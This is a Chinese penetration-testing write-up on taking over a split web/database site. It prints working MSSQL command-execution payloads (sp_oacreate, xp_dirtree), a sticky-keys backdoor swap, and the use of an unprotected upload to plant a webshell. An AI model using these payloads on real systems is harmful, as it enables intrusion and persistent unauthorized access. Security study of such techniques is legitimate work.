实战-站库分离拿下WebShell

文章来源:重生信息安全
作者:海鸥

一、目录遍历

在对目标进行目录扫描的时候,发现其app目录存在目录遍历。
24534-islakn1vsho.png

在目录中发现了app的备份文件,在备份中找到了其数据库文件
34781-mez4qomwtnb.png

竟然使用的是sa账户连接的!!!

主站无CDN,且IP地址与数据库配置文件中的IP不一致,典型的站库分离。

33936-kw42mnkzrv.png

12202-dpzalbh17or.png

现在有Sa的账号密码,先从数据库开始渗透。

2、Mssql渗透

(1)Xp_cmdshell

使用sqlmap 直连数据库

sqlmap -d "db_type://user:pwd@ip:port/db" command
无法执行命令也没有回显,但是得到其版本为2000。

51218-dfg06vaqrjf.png

尝试连接数据库手动执行命令。

Navicat不支持连接Mssql2000,这里改用Database4来连接。

Mssql2005及以上版本默认关闭Xp_cmdshell,2000可以直接调用Xp_cmdshell执行命令。

连上之后执行命令报错了,

18792-4prkhe1aixm.png

查了一下可能是因为数据库没权限创建Cmd进程。

77818-yrorat5tsbq.png

(2)Sp_oacreate执行命令

sp_oacreate的劣勢是沒有回显,但是可以将命令的输出写到文件,我们再读取文件即可。

找到了Sp_oacreate两种执行命令的方式

declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd
/c whoami >e:\test.txt','c:\windows\system32','','1';

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami > c:\\1.txt'

在这里执行这两条命令,都会直接卡死,估计是被拦了。

16149-2wulhugblpp.png

(3)Sp_oacreate粘贴键替换调用Cmd

这种方式等于是做了一个shift后门。

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe'
,'c:\windows\system32\sethc.exe';


declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe'
,'c:\windows\system32\dllcache\sethc.exe';

语句可以成功執行,但是调不出来,未知原因。

78051-gj4xy9otbu.png

(4)Sp_oacreate读写文件

这个功能
81386-m73nkc7zya.png
在有Web服务的时候很好用

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'e:\tmp1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'tes1t'

38301-vwt15vp80qq.png

查看目录结构

execute master..xp_dirtree 'e:\',1,1
40603-ko5bbba2yiq.png
查看文件内容
表名不能重复,查一次换一次表名。

75260-qnlbempcx5a.png

3、代码审计

代码审计过程中,在源码中找到一个Upload功能,对上传文件没有做任何防护。会直接将上传的文件,上传到http://主站IP:8082/upload下。

76125-ocpx7n1pj3r.png

构造html上传页面,并将其提交到app目录下的这个upload.php文件即可。

00125-rkuon24w3d.png

先上传一个正常"萨斯该"的图片

66160-toorp7zenei.png

这里有个坑,他给的路径是错的直接访问找不到。最后在主站下边的这个app目录下找到了

16811-tswd1ybukkn.png

上传Webshell,刚上传一句话木马被杀了。

以为php不能上传,上传了个phpinfo可以执行,改上传冰蝎的马成功Getshell。

86655-iwh6fs5xczf.png

54569-kt51ix2x6aq.png

原创文章,作者:运营,如若转载,请注明出处:http://www.csxxaq.com/yc/1828.html
2651万台金立手机被植入木马!判决书曝光
« 上一篇 12-08
记一次漏洞挖掘实战之木桶短板
下一篇 » 12-10

相关推荐

CS4.1真的有后门吗?

文章来源:酒仙桥六号部队前言CS是什么?可能是某款历史久远的第一人称射击游戏,也可能是某个电影。由于法律原因我们这里并不指出CS是什么,但网络江湖上一直流...

记一次漏洞挖掘实战之木桶短板

客户给了个站 授权渗透客户要求:纯黑盒 无测试账号就一个登录框 忘记密码功能还是这样人直接傻了 先看看能不能爆破吧发现密码加密了好家伙 还是动态密钥验...

「翻译」 如何Bypass rbash

前言我们都知道安全分析师和黑客的关系像tom和jerry一样,一个人采取措施加强安全等级,另外一个人试图绕过它。这种类似的情况出现在我解决CTF挑战的时候...